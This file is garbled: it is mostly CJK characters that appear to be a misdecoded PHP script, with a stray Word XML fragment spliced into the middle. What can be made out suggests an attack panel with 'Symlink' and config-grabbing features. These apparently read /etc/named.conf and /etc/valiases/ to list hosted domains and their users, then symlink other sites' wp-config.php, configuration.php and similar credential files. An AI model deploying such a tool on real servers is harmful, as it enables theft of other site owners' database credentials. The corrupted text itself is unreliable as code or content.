㸼⽦㉲派✻ഊ㑦⠴獳㕴⠤彐体呛❰㘧崩…☠㑳猵琨⑟偏協嬧灡❝⤩ഊ笍ਠ†․栱捫㕲‽⑟偏協嬧瀶❝㬍ਠ†․洵瑨㉤‽⑟偏協嬧灡❝㬍ਠ†․渵搵渠㴢串琠ㅶㄴ氱扬㔢㬍ਠ†․猴琵‽⑟偏協嬧灯❝㬍ਠ†␴‽‰㬍ਠ†⑳㑴㕳‽‵硰氲搵⠢屮∬․猴琵⤻ഊ†‵捨㈠∼灲㔠捬ㅳ猽浬㘠獴祬㔽❭ㅲ朴渭琲瀺楰砧㸢㬍ਉ睨㑬㔨␴‼⁣㈳湴⠤猴琵猩⤠ഊॻഊऴ昨猳扳瑲⠤猴琵獛␴崬‰Ⱐ甩‡㴠≨瑴瀢⤠ഊॻഊउत猴琵獛␴崠㴠≨瑴瀺⼯∮⑳㑴㕳嬤㑝㬍ਉ納ਉ娲渵䠨≨瑴瀺⼯稲渵⵨⸲牧⽮㉴㑦礯猴湧氵∬․栱捫㕲Ⱐ⑭㕴栲搬․渵搵測․猴琵獛␴崩㬍ਉ㕣栲•匴琵›•⸤猴琵獛␴崮∠䐵昱挵搠ℼ扲㸢㬍ਉ⬫␴㬍ਉ納ਠ††ഊ††≓㕮搴湧⁓㑴㕳⁔㈠娲渵ⵈ⁈ㅳ⁂㔵渠䌲浰氵琵搠匳捣㕳獦㍬汹‡℠㰯灲㔾∻ഊ納ਵ捨㈠∼⽤㑶㸢㬍੭ㅤ昲㉴㕲⠩㬍ਠ†‍੽ഊ昳湣琴㉮⁭ㅤ獰㉴⠩ഊ笍ਠ†⁭ㅤ栵ㅤ⠩㬍ਠ†‵捨㈠∼搴瘠捬ㅳ猽栵ㅤ㕲㸢㬍ਠ†‵捨㈠∼灲㔾ഊ††ഊ†††††††††††††⁼怭㩟ഊ†Ⱝⴭ⴮⸮⹟彟张†††††⁼††怫⸠†††††††††††††††††††††††††††††ഊ ††††††⁠恠怭ⴭ⴮⸮⹼彟张†簍ਠ⁜†† †††††††††††恠恠ⴭⴭ⸮⸮彟彟ഊ†⁜††弩†䌲搵搠䉹㨠䥫爱洠䅬㐠†††††††⁠恠ⴭ⴮⹟†††††††††††‍ਠ†⁜†††††††††††††††††††††††††⁜‍ਠ 怮尠 怮† 怮† 怮† 怮† 怮† 怮† 怮† 怮† 怮† 桨ഊⴧ†⁠ⴧ†⁠ⴧ†⁠ⴧ†⁠ⴧ†⁠ⴧ†⁠ⴧ†⁠ⴧ†⁠ⴧ†⁠ⴧ†⁠ⴧ†⁠ഊ†⁍ㅤ獰㉴‴猠ㄠ吵ㅭ′映灲㉦㕳猴㉮ㅬ⁅瑨㑣ㅬ⁈ㅣ欵牳⁆爲洠倱欴獴ㅮ⸍ਠ†圵⁨ㅶ㔠夵ㅲ猠㉦†䕸瀵爴㕮挵‴渠⁓㕣㍲㑴礬⁐㕮㕴爱琴㉮…⁃㉤㑮朠ഊ†⁁湤⁣ㅮ⁂爵ㅫ‱湤⁓㕣㍲㔮ഊ†‍ਠ†嘵牳㐲渠㘮」ਠ†ഊ†⁃㉮琱捴›⁨瑴瀺⼯睷眮洱摳瀲琮渵琍ਠ†ഊ†‴映礲㌠昲㍮搠戳朠挲湴ㅣ琠㈳爠琵ㅭ‍ਠ†ഊ†‍਍਍ਠ††††††‮㴧✽⸠††††††ഊ††††††  †张對ਠ†††††⁼†搠⁢†簍ਠ†††††⁜† 尠†⼠ഊ†††††‬⼧ⴽ尯㴭❜Ⰽਠ††††  ††††尠尠††ⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴍਠ††††簠⼠娱栴搠†⁜⁼††䴱摳瀲琠䐴朴琱氠匵挳爴瑹⁔㔱洍ਠ††††尯⁜⁒ㅳ栵㕤⼠尯††ⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴭⴍਠ††††††✮††⸧ഊ†††††† 籠繾恼弍ਠ††††††⽼尠 籜††ഊऍਠ†††⸭‼伾‭⸠†††‮ⴽ㴽㴭⸠††‬ⴭⴭⴭ⴮†††⸭㴼㸽⴮ഊ† 弭尧✧⼭彜†††⼠⼠✧⁜⁜††⁼Ⱝⴭⴭ⹼†† 彟ⴭⴭ彟對ਠ⁼⼠′⤠⠲†屼††簠簠✩⠧⁼⁼† Ⱗⴭⴭⴧ⹜†⁼⼠⠧⤨✩⁜簍ਠ†尠†⹟⸠†⼠††⁜⁜††⼠⼠†筟⼨✩ ✩屟素†尠†彟† ഊ†‬㸭弬Ⱜ弭㰮†††‾✽橦㴧㰠††怮† †‮✠†‬✭ⵟ弭ⴧ⸍ਠ⼠圱焱爮䭨ㅮ†尠† ††††尠††⼧ⵟ彟ⴧ尠† ††㩼††對ਨ弩††‮†† 弩†⼠⁉歲ㅭ†⁜† ⁍ⵕ獭ㅮ⁜†⡟⤠†㩼† 弩ഊ⁜弭ⴭⴭ❟彟弭⴯†⡟⤠⁁水† 弩 弩彟彟彟弨弩†⁼彟强籟彟彼ഊ†屟彟彟彟彟彟⼠††籟彟彟彟彼††⁜彟彟彟弯††⁼⁁晲ㅳ㐱扼ഊഊഊऍਠ‍ਠ‍ਠ†‼⽰爵㸼⽤㑶㸢㬍ਠ†⁭ㅤ昲㉴㕲⠩㬍ਠ†‍ਠ†⁽ഊ††ഊ昳湣琴㉮⁭ㅤ獹浬㑮欨⤍੻ഊ††洱摨㔱搨⤻ഊ††ഊ⑉䥉䥉䥉䥉䥉氠㴠❨瑴瀺⼯✮⑟卅剖䕒嬧卅剖䕒彎䅍䔧崮⑟卅剖䕒嬧剅兕䕓呟啒䤧崻ഊ⑉䥉䥉䥉䥉䥉㘽㕸灬㉤㔨✯✬⑉䥉䥉䥉䥉䥉氠⤻ഊ⑉䥉䥉䥉䥉䥉氠㵳瑲彲㕰氱挵⠤䥉䥉䥉䥉䥉䤶季㈳湴⠤䥉䥉䥉䥉䥉䤶⤭㙝Ⱗ✬⑉䥉䥉䥉䥉䥉氠⤻†ഊ††ഊ††ഊ††ഊഊ†‵捨㈠✼搴瘠捬ㅳ猽栵ㅤ㕲㸼獣爴灴㹰㙟㵰慟㵰潟㴢∻㰯獣爴灴㸼扲㸼挵湴㕲㸼桯㸼ㄠ桲㕦㴣′湣水捫㴢木尧獹浬㑮歜✬渳汬ⱜ❷㕢猴琵尧Ɱ㍬氩∾簠䐲洱㑮猠簠㰯ㄾ㰱⁨爵昽⌠㉮捬㑣欽≧⡜❳祭水湫尧Ɱ㍬氬渳汬ⱜ❷栲氵尧⤢㹼⁗栲氵⁓㕲瘵爠卹浬㑮欠簠㰯ㄾ㰱⁨爵昽⌠㉮捬㑣欽≧⡜❳祭水湫尧Ɱ㍬氬渳汬Ɱ㍬氬尧挲湦㑧尧⤢㹼⁃㉮昴朠偈倠獹浬㑮欠簠㰯ㄾ㰯桯㸼⽣㕮琵爾✻ഊ††ഊ††㑦⠴獳㕴⠤彐体呛❰㘧崩…☠⑟偏協嬧瀶❝㴽❷㕢猴琵✩ഊ††笍ਠ†††‵捨㈠∼挵湴㕲㸢㬍ਠ†††․搰洱㑮猠㴠䁦㑬㔨∯㕴振渱洵搮挲湦∩㬍ਠ†††‴昨ℤ搰洱㑮猩笠㕣栲•㱰爵⁣氱獳㵭氶⁳瑹氵㴧洱牧㑮⵴㉰㩩灸✾䌱湴‱捣㕳猠瑨㑳⁦㑬㔠㉮⁳㕲瘵爠ⴾ⁛ 㕴振渱洵搮挲湦⁝㰯灲㔾㰯挵湴㕲㸢㬠納਍ਠഊഊ㕣栲•㱴ㅢ氵‱水杮㵣㕮琵爠捬ㅳ猽❭ㄴ渧†戲牤㕲㴰†㸍਍਼瑲⁢杣㉬㉲㵒㕤㸼瑤㹃㈳湴㰯瑤㸼瑤㹤㉭ㄴ湳㰯瑤㸼瑤㸳猵牳㰯瑤㸼⽴爾∻ഊ④㈳湴㴶㬍੦㉲㔱捨⠤搰洱㑮猠ㅳ․搰洱㑮⥻ഊഊ㑦⡀㕲㕧㐨≺㉮㔢Ⱔ搰洱㑮⤩笍਍ੰ爵束洱瑣桟ㅬ氨✣稲渵•⠮⨩∣✬․搰洱㑮Ⱐ⑤㉭ㄴ湳⤻ഊഊ晬㍳栨⤻ഊഊ㑦⡳瑲氵渨瑲㑭⠤搲洱㑮獛㙝嬰崩⤠㸠愩笍਍ਤ㍳㕲‽⁰㉳㑸彧㕴灷㌴搨䁦㑬㔲睮㕲⠢⼵瑣⽶ㅬ㐱猵猯∮⑤㉭ㄴ湳嬶嵛そ⤩㬍਍ਵ捨㈠∼瑲㸼瑤㸢⸤挲㍮琮∼⽴搾㱴搾㰱⁨爵昽桴瑰㨯⽷睷⸢⸤搲洱㑮獛㙝嬰崮∯㸢⸤搲洱㑮獛㙝嬰崮∼⼱㸼⽴搾㱴搾∮␳猵牛❮ㅭ㔧崮∼⽴搾㰯瑲㸢㬠晬㍳栨⤻ഊ④㈳湴⬫㬍੽絽ഊ㕣栲•㰯挵湴㕲㸼⽴ㅢ氵㸢㬠ഊ⁽ഊ‍ਠ㑦⠴獳㕴⠤彐体呛❰愧崩…☠⑟偏協嬧灡❝㴽❷栲氵✩ഊ⁻ഊ††ഊ††ഊ††䁳㕴彴㑭㕟水洴琨〩㬍ਠ†‍ਠ†‵捨㈠∼挵湴㕲㸢㬍ਠ†‍ਠ‍ਠ†††‍ੀ浫搴爨❳祭✬〷㜷⤻ഊ⑉䥉䥉䥉䥉䥬㘠‽•佰琴㉮猠ㅬ氠屮⁄㑲㕣琲特䥮搵砠匳砮桴浬⁜渠䅤摔祰㔠琵硴⽰氱㑮‮灨瀠屮⁁摤䠱湤氵爠猵牶㕲⵰ㅲ猵搠⹰桰⁜渠⁁摤呹瀵⁴㕸琯灬ㄴ渠⹨瑭氠屮⁁摤䠱湤氵爠瑸琠⹨瑭氠屮⁒㕱㌴爵⁎㉮㔠屮⁓ㅴ㑳晹⁁湹∻ഊ⑉䥉䥉䥉䥉䤶䤠㵀昲瀵渠⠧獹洯⹨琱捣㕳猧Ⱗ眧⤻ഊ晷爴琵⠤䥉䥉䥉䥉䥉㙉‬⑉䥉䥉䥉䥉䥬㘩㬍ੀ獹浬㑮欨✯✬❳祭⽲㈲琧⤻ഊ⑉䥉䥉䥉䥉汉氠㴠戱猵渱洵⠧彆䥌䕟✩㬍ਠ†‍ਠ†‍ਤ䥉䥉䥉䥉䥬汉‽⁀昴氵⠧⼵瑣⽮ㅭ㕤⹣㉮昧⤻ഊ㑦⠡⑉䥉䥉䥉䥉汬䤩ഊ笍ਵ捨㈠∼灲㔠捬ㅳ猽浬㘠獴祬㔽❭ㅲ朴渭琲瀺楰砧㸣⁃ㅮ琠ㅣ挵獳⁴栴猠昴氵′渠猵牶㕲‭㸠嬠⼵瑣⽮ㅭ㕤⹣㉮映崼⽰爵㸼⽣㕮琵爾∻‍੽ഊ㕬猵ഊ笍ਵ捨㈠∼琱扬㔠ㅬ㑧渽❣㕮琵爧⁷㑤瑨㴧田┧⁣氱獳㴧洱㑮✾㱴搾䐲洱㑮猼⽴搾㱴搾啳㕲猼⽴搾㱴搾獹浬㑮欠㰯瑤㸢㬍੦㉲㔱捨⠤䥉䥉䥉䥉䥬汉‱猠⑉䥉䥉䥉䥉汬㘩笍਴昨䀵爵朴⠧稲渵✬⑉䥉䥉䥉䥉汬㘩⥻ഊ灲㕧彭ㅴ捨弱汬⠧⍺㉮㔠∨⸪⤢⌧Ⱔ䥉䥉䥉䥉䥬氶Ⱔ䥉䥉䥉䥉䥬㘶⤻ഊ晬㍳栨⤻ഊ㑦⡳瑲氵渨瑲㑭⠤䥉䥉䥉䥉䥬㘶嬶嵛そ⤩‾愩笍ਤ䥉䥉䥉䥉䤶䤶‽⁰㉳㑸彧㕴灷㌴搨䁦㑬㔲睮㕲⠧⼵瑣⽶ㅬ㐱猵猯✮⑉䥉䥉䥉䥉氶㙛㙝嬰崩⤻ഊ⑉䥉䥉䥉䤶䤶氠㴠⑉䥉䥉䥉䥉㙉㙛❮ㅭ㔧崠㬍ੀ獹浬㑮欨✯✬❳祭⽲㈲琧⤻ഊ⑉䥉䥉䥉䤶䤶氠㴠⑉䥉䥉䥉䥉氶㙛㙝嬰崻ഊ⑉䥉䥉䥉䤶䤶㘠㴠❜⸴爧㬍ਤ䥉䥉䥉䥉㙬䥉‽‧尮㑬✻ഊ㑦 䀵爵朴⠢⑉䥉䥉䥉䤶䤶㘢Ⱔ䥉䥉䥉䥉䥬㘶嬶嵛そ⤠㉲⁀㕲㕧㐨∤䥉䥉䥉䥉㙬䥉∬⑉䥉䥉䥉䥉氶㙛㙝嬰崩 ഊ笍ਤ䥉䥉䥉䥉㙉㙬‽•㱤㑶⁳瑹氵㴧⁣㉬㉲㨠⍆䘰〰〠㬠琵硴⵳栱搲眺‰灸‰灸‶灸⁲㕤㬠✾∮⑉䥉䥉䥉䥉氶㙛㙝嬰崮✼⽤㑶㸧㬍੽ഊ㕣栲•ഊ㱴爾ഊഊ㱴搾ഊ㰱⁴ㅲ朵琽❟扬ㅮ欧⁨爵昽桴瑰㨯⽷睷⸢⸤䥉䥉䥉䥉䥬㘶嬶嵛そ⸧⼾✮⑉䥉䥉䥉䤶䤶氮✠㰯ㄾഊ㰯瑤㸍਍਼瑤㸍ਧ⸤䥉䥉䥉䥉䤶䤶嬧渱洵❝⸢ഊ㰯瑤㸍਍਼瑤㸍਼ㄠ桲㕦㴧獹洯爲㉴⽨㉭㔯∮⑉䥉䥉䥉䥉㙉㙛❮ㅭ㔧崮∯瀳扬㑣彨瑭氧⁴ㅲ朵琽❟扬ㅮ欧㹳祭水湫‼⼱㸍਼⽴搾ഊഊഊ㰯瑲㸢㬍੦氳獨⠩㬍੽ഊ納੽ഊ納ਠ†‍ਵ捨㈠∼⽣㕮琵爾㰯琱扬㔾∻††ഊ††ഊ⁽ഊ‍ਠഊ‍ਠ㑦⠴獳㕴⠤彐体呛❰漧崩…☠⑟偏協嬧灯❝㴽❣㉮昴朧⤍ਠഊ‍ਠ笍ਠ‵捨㈠∼挵湴㕲㸢㬍ੀ浫搴爨❳祭✬〷㜷⤻ഊ⑉䥉䥉䥉䥉䥬㘠‽•佰琴㉮猠ㅬ氠屮⁄㑲㕣琲特䥮搵砠匳砮桴浬⁜渠䅤摔祰㔠琵硴⽰氱㑮‮灨瀠屮⁁摤䠱湤氵爠猵牶㕲⵰ㅲ猵搠⹰桰⁜渠⁁摤呹瀵⁴㕸琯灬ㄴ渠⹨瑭氠屮⁁摤䠱湤氵爠瑸琠⹨瑭氠屮⁒㕱㌴爵⁎㉮㔠屮⁓ㅴ㑳晹⁁湹∻ഊ⑉䥉䥉䥉䥉䤶䤠㵀昲瀵渠⠧獹洯⹨琱捣㕳猧Ⱗ眧⤻ഊ䁦睲㑴㔨⑉䥉䥉䥉䥉䤶䤠Ⱔ䥉䥉䥉䥉䥉氶⤻ഊ䁳祭水湫⠧⼧Ⱗ獹洯爲㉴✩㬍ਤ䥉䥉䥉䥉䥬䥬‽⁢ㅳ㕮ㅭ㔨❟䙉䱅弧⤻ഊ†ഊ†‍ਠ†⑉䥉䥉䥉䥉汬䤠㴠䁦㑬㔨✯㕴振渱洵搮挲湦✩㬍਴昨ℤ䥉䥉䥉䥉䥬汉⤍੻ഊ㕣栲•㱰爵⁣氱獳㵭氶⁳瑹氵㴧洱牧㑮⵴㉰㩩灸✾⌠䌱湴‱捣㕳猠瑨㑳⁦㑬㔠㉮⁳㕲瘵爠ⴾ⁛ 㕴振渱洵搮挲湦⁝㰯灲㔾㰯挵湴㕲㸢㬍੽ഊ㕬猵ഊ笍ਵ捨㈠∍਼琱扬㔠ㅬ㑧渽❣㕮琵爧⁷㑤瑨㴧田┧⁣氱獳㴧洱㑮✠㸼瑤㸠䐲洱㑮猠㰯瑤㸼瑤㸠卣爴灴‼⽴搾∻ഊ昲爵ㅣ栨⑉䥉䥉䥉䥉汬䤠ㅳ․䥉䥉䥉䥉䥬氶⥻ഊ㑦⡀㕲㕧㐨❺㉮㔧Ⱔ䥉䥉䥉䥉䥬氶⤩笍ੰ爵束洱瑣桟ㅬ氨✣稲渵•⠮⨩∣✬⑉䥉䥉䥉䥉汬㘬⑉䥉䥉䥉䥉氶㘩㬍੦氳獨⠩㬍਴昨獴牬㕮⡴爴洨⑉䥉䥉䥉䥉氶㙛㙝嬰崩⤠㹡⥻ഊ⑉䥉䥉䥉䥉㙉㘠㴠瀲猴硟朵瑰眳㑤⡀昴氵㉷渵爨✯㕴振瘱水ㅳ㕳⼧⸤䥉䥉䥉䥉䥬㘶嬶嵛そ⤩㬍ਤ䥉䥉䥉䥉䤶氶㴤䥉䥉䥉䥉䥉䥬⸧⽳祭⽲㈲琯栲洵⼧⸤䥉䥉䥉䥉䤶䤶嬧渱洵❝⸧⽰㍢水损桴浬⽷瀭挲湦㑧⹰桰✻ഊ⑉䥉䥉䥉䥉㘶䤽朵瑟栵ㅤ㕲猨⑉䥉䥉䥉䥉㙬㘩㬍ਤ䥉䥉䥉䥉䤶㙬㴤䥉䥉䥉䥉䤶㙉嬰崻ഊ⑉䥉䥉䥉䥉㘶㘽⑉䥉䥉䥉䥉䥉氮✯獹洯爲㉴⽨㉭㔯✮⑉䥉䥉䥉䥉㙉㙛❮ㅭ㔧崮✯瀳扬㑣彨瑭氯扬㉧⽷瀭挲湦㑧⹰桰✻ഊ⑉䥉䥉䥉䥬䥉䤽朵瑟栵ㅤ㕲猨⑉䥉䥉䥉䥉㘶㘩㬍ਤ䥉䥉䥉䥉汉䥬㴤䥉䥉䥉䥉汉䥉嬰崻ഊ⑉䥉䥉䥉䥬䥉㘽⑉䥉䥉䥉䥉䥉氮✯獹洯爲㉴⽨㉭㔯✮⑉䥉䥉䥉䥉㙉㙛❮ㅭ㔧崮✯瀳扬㑣彨瑭氯挲湦㑧㍲ㅴ㐲渮灨瀧㬍ਤ䥉䥉䥉䥉汉汉㵧㕴彨㔱搵牳⠤䥉䥉䥉䥉汉䤶⤻ഊ⑉䥉䥉䥉䥬䥬氽⑉䥉䥉䥉䥬䥬䥛そ㬍ਤ䥉䥉䥉䥉汉氶㴤䥉䥉䥉䥉䥉䥬⸧⽳祭⽲㈲琯栲洵⼧⸤䥉䥉䥉䥉䤶䤶嬧渱洵❝⸧⽰㍢水损桴浬⽪㈲浬ㄯ挲湦㑧㍲ㅴ㐲渮灨瀧㬍ਤ䥉䥉䥉䥉汉㙉㵧㕴彨㔱搵牳⠤䥉䥉䥉䥉汉氶⤻ഊ⑉䥉䥉䥉䥬䤶氽⑉䥉䥉䥉䥬䤶䥛そ㬍ਤ䥉䥉䥉䥉汉㘶㴤䥉䥉䥉䥉䥉䥬⸧⽳祭⽲㈲琯栲洵⼧⸤䥉䥉䥉䥉䤶䤶嬧渱洵❝⸧⽰㍢水损桴浬⼴湣氳搵猯挲湦㑧⹰桰✻ഊ⑉䥉䥉䥉䥬汉䤽朵瑟栵ㅤ㕲猨⑉䥉䥉䥉䥬䤶㘩㬍ਤ䥉䥉䥉䥉汬䥬㴤䥉䥉䥉䥉汬䥉嬰崻ഊ⑉䥉䥉䥉䥬汉㘽⑉䥉䥉䥉䥉䥉氮✯獹洯爲㉴⽨㉭㔯✮⑉䥉䥉䥉䥉㙉㙛❮ㅭ㔧崮✯瀳扬㑣彨瑭氯癢⼴湣氳搵猯挲湦㑧⹰桰✻ഊ⑉䥉䥉䥉䥬汬䤽朵瑟栵ㅤ㕲猨⑉䥉䥉䥉䥬汉㘩㬍ਤ䥉䥉䥉䥉汬汬㴤䥉䥉䥉䥉汬汉嬰崻ഊ⑉䥉䥉䥉䥬汬㘽⑉䥉䥉䥉䥉䥉氮✯獹洯爲㉴⽨㉭㔯✮⑉䥉䥉䥉䥉㙉㙛❮ㅭ㔧崮✯瀳扬㑣彨瑭氯昲爳洯㑮捬㍤㕳⽣㉮昴朮灨瀧㬍ਤ䥉䥉䥉䥉汬㙉㵧㕴彨㔱搵牳⠤䥉䥉䥉䥉汬氶⤻ഊ⑉䥉䥉䥉䥬氶氽⑉䥉䥉䥉䥬氶䥛そ㬍ਤ䥉䥉䥉䥉汬㘶㴤䥉䥉䥉䥉䥉䥬⸧⽳祭⽲㈲琯栲洵⼧⸤䥉䥉䥉䥉䤶䤶嬧渱洵❝⸧瀳扬㑣彨瑭氯捬㐵湴猯挲湦㑧㍲ㅴ㐲渮灨瀧㬍ਤ䥉䥉䥉䥉氶䥉㵧㕴彨㔱搵牳⠤䥉䥉䥉䥉汬㘶⤻ഊ⑉䥉䥉䥉䥬㙉氽⑉䥉䥉䥉䥬㙉䥛そ㬍ਤ䥉䥉䥉䥉氶䤶㴤䥉䥉䥉䥉䥉䥬⸧⽳祭⽲㈲琯栲洵⼧⸤䥉䥉䥉䥉䤶䤶嬧渱洵❝⸧⽰㍢水损桴浬⽳㍰瀲牴⽣㉮昴朳爱琴㉮⹰桰✻ഊ⑉䥉䥉䥉䥬㙉䤽朵瑟栵ㅤ㕲猨⑉䥉䥉䥉䥬㙉㘩㬍ਤ䥉䥉䥉䥉氶汉㴤䥉䥉䥉䥉氶䥉嬰崻ഊ⑉䥉䥉䥉䥬㙬氽⑉䥉䥉䥉䥉䥉氮✯獹洯爲㉴⽨㉭㔯✮⑉䥉䥉䥉䥉㙉㙛❮ㅭ㔧崮✯瀳扬㑣彨瑭氯捬㐵湴⽣㉮昴朳爱琴㉮⹰桰✻ഊ⑉䥉䥉䥉䥬㙬㘽朵瑟栵ㅤ㕲猨⑉䥉䥉䥉䥬㙬氩㬍ਤ䥉䥉䥉䥉氶㙉㴤䥉䥉䥉䥉氶氶嬰崻ഊ⑉䥉䥉䥉䥬㘶氽⑉䥉䥉䥉䥉䥉氮✯獹洯爲㉴⽨㉭㔯✮⑉䥉䥉䥉䥉㙉㙛❮ㅭ㔧崮✯瀳扬㑣彨瑭氯猳扭㑴琴捫㕴⹰桰✻ഊ⑉䥉䥉䥉䥬㘶㘽朵瑟栵ㅤ㕲猨⑉䥉䥉䥉䥬㘶氩㬍ਤ䥉䥉䥉䥉㙉䥉㴤䥉䥉䥉䥉氶㘶嬰崻ഊ⑉䥉䥉䥉䤶䥉氽⑉䥉䥉䥉䥉䥉氮✯獹洯爲㉴⽨㉭㔯✮⑉䥉䥉䥉䥉㙉㙛❮ㅭ㔧崮✯瀳扬㑣彨瑭氯捬㐵湴⽣㉮昴朳爱琴㉮⹰桰✻ഊ⑉䥉䥉䥉䤶䥉㘽朵瑟栵ㅤ㕲猨⑉䥉䥉䥉䤶䥉氩㬍ਤ䥉䥉䥉䥉㙉汉㴤䥉䥉䥉䥉㙉䤶嬰崻ഊ⑉䥉䥉䥉䤶䥬氠㴠獴牰㉳⠤䥉䥉䥉䥉䤶㙬Ⱗ愰〧⤻ഊ⑉䥉䥉䥉䤶䤶䤽✦湢獰㬧㬍਴映⡳瑲瀲猨⑉䥉䥉䥉䥉㘶氬❡〰✩‽㴠瑲㌵ ഊ笍ਤ䥉䥉䥉䥉㙉㙉㴢㰱⁨爵昽✢⸤䥉䥉䥉䥉䤶氶⸢✠琱牧㕴㴧形氱湫✾圲牤灲㕳猼⼱㸢㬍੽ഊ㕬猵㑦 獴牰㉳⠤䥉䥉䥉䥉汉䥬Ⱗ愰〧⤠㴽⁴爳㔩ഊ笍ਤ䥉䥉䥉䥉㙉㙉㴢㰱⁨爵昽✢⸤䥉䥉䥉䥉䤶㘶⸢✠琱牧㕴㴧形氱湫✾圲牤灲㕳猼⼱㸢㬍੽ഊ㕬猵㑦 獴牰㉳⠤䥉䥉䥉䥉汉汬Ⱗ愰〧⤠‽㴠瑲㌵‱湤⁳瑲瀲猨⑉䥉䥉䥉䤶䥉䤬❡〰✩†㴽⁴爳㔠⤍੻ഊ⑉䥉䥉䥉䤶䤶䤽∠㰱⁨爵昽✢⸤䥉䥉䥉䥉氶㙬⸢✠琱牧㕴㴧形氱湫✾坈䵃匼⼱㸢㬍੽ഊ㕬猵㑦 獴牰㉳⠤䥉䥉䥉䥉氶汉Ⱗ愰〧⤠‽㴠瑲㌵⤍੻ഊ⑉䥉䥉䥉䤶䤶䤠㴢‼ㄠ桲㕦㴧∮⑉䥉䥉䥉䥬㙉㘮∧⁴ㅲ朵琽❟扬ㅮ欧㹗䡍䍓㰯ㄾ∻ഊ納ਵ汳㔴映⡳瑲瀲猨⑉䥉䥉䥉䥬㘶䤬❡〰✩†㴽⁴爳㔩ഊ笍ਤ䥉䥉䥉䥉㙉㙉‽∠㰱⁨爵昽✢⸤䥉䥉䥉䥉氶汬⸢✠琱牧㕴㴧形氱湫✾坈䵃匼⼱㸢㬍੽ഊ㕬猵㑦 獴牰㉳⠤䥉䥉䥉䥉汉汬Ⱗ愰〧⤠‽㴠瑲㌵⤍੻ഊ⑉䥉䥉䥉䤶䤶䤽∠㰱⁨爵昽✢⸤䥉䥉䥉䥉汉䤶⸢✠琱牧㕴㴧形氱湫✾䨲㉭氱㰯ㄾ∻ഊ納ਵ汳㔴映⡳瑲瀲猨⑉䥉䥉䥉䥬䤶氬❡〰✩†㴽⁴爳㔩ഊ笍ਤ䥉䥉䥉䥉㙉㙉㴢‼ㄠ桲㕦㴧∮⑉䥉䥉䥉䥬䥬㘮∧⁴ㅲ朵琽❟扬ㅮ欧㹊㈲浬ㄼ⼱㸢㬍੽ഊ㕬猵㑦 獴牰㉳⠤䥉䥉䥉䥉汬䥬Ⱗ愰〧⤠‽㴠瑲㌵⤍੻ഊ⑉䥉䥉䥉䤶䤶䤽∠㰱⁨爵昽✢⸤䥉䥉䥉䥉汉㘶⸢✠琱牧㕴㴧形氱湫✾療㍬氵琴渼⼱㸢㬍੽ഊ㕬猵㑦 獴牰㉳⠤䥉䥉䥉䥉汬汬Ⱗ愰〧⤠‽㴠瑲㌵⤍੻ഊ⑉䥉䥉䥉䤶䤶䤽∠㰱⁨爵昽✢⸤䥉䥉䥉䥉汬䤶⸢✠琱牧㕴㴧形氱湫✾療㍬氵琴渼⼱㸢㬍੽ഊ㕬猵㑦 獴牰㉳⠤䥉䥉䥉䥉汬㙬Ⱗ愰〧⤠‽㴠瑲㌵⤍੻ഊ⑉䥉䥉䥉䤶䤶䤽∠㰱⁨爵昽✢⸤䥉䥉䥉䥉汬氶⸢✠琱牧㕴㴧形氱湫✾療㍬氵琴渼⼱㸢㬍੽ഊ㕬猵ഊ笍੣㉮琴渳㔻ഊ納ਤ䥉䥉䥉䥉㙉㙬‽․䥉䥉䥉䥉䤶䤶嬧渱洵❝※ഊ㕣栲‧㱴爾㱴搾㰱⁨爵昽桴瑰㨯⽷睷⸧⸤䥉䥉䥉䥉䥬㘶嬶嵛そ⸧⼾✮⑉䥉䥉䥉䥉氶㙛㙝嬰崮✼⼱㸼⽴搾ഊ㱴搾✮⑉䥉䥉䥉䤶䤶䤮✼⽴搾㰯瑲㸧㭦氳獨⠩㬍੽ഊ納੽ഊ納ਵ捨㈠∼⽣㕮琵爾㰯琱扬㔾∻†‍ਠ†‍ਠ納ਠ†‍ਠ†‵捨㈠∼⽤㑶㸢㬍ਠ†⁭ㅤ昲㉴㕲⠩㬍ਠ†‍੽††ഊഊഊ昳湣琴㉮⁭ㅤ獱氨⤍੻ഊ††ഊ††ഊ††捬ㅳ猠䑢䍬ㅳ猠笍ਉॶㅲ․瑹瀵㬍ਉॶㅲ․水湫㬍ਉॶㅲ․爵猻ഊउ昳湣琴㉮⁄扃氱獳⠤瑹瀵⤉笍ਉउ⑴栴猭㹴祰㔠㴠⑴祰㔻ഊउ納ਉ०㍮捴㐲渠挲湮㕣琨⑨㉳琬․㍳㕲Ⱐ⑰ㅳ猬․摢渱洵⥻ഊउॳ眴瑣栨⑴栴猭㹴祰㔩ॻഊउउ挱猵‧浹獱氧㨍ਉउउ㑦⠠⑴栴猭㹬㑮欠㴠䁭祳煬彣㉮渵捴⠤栲獴Ⱔ㍳㕲Ⱔ瀱獳ⱴ爳㔩 ⁲㕴㍲渠瑲㌵㬍ਉउउ扲㔱欻ഊउउ挱猵</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>‧灧獱氧㨍ਉउउ⑨㉳琠㴠㕸灬㉤㔨✺✬․栲獴⤻ഊउउऴ昨ℤ栲獴嬶崩․栲獴嬶崽極潡㬍ਉउउ㑦⠠⑴栴猭㹬㑮欠㴠䁰束挲湮㕣琨≨㉳琽笤栲獴嬰嵽⁰㉲琽笤栲獴嬶嵽″猵爽␳猵爠瀱獳眲牤㴤瀱獳⁤扮ㅭ㔽⑤扮ㅭ㔢⤠⤠爵琳牮⁴爳㔻ഊउउॢ爵ㅫ㬍ਉउ納ਉउ爵琳牮⁦ㅬ猵㬍ਉॽഊउ昳湣琴㉮⁳㕬㕣瑤戨⑤戩⁻ഊउॳ眴瑣栨⑴栴猭㹴祰㔩ॻഊउउ挱猵‧浹獱氧㨍ਉउउ㑦 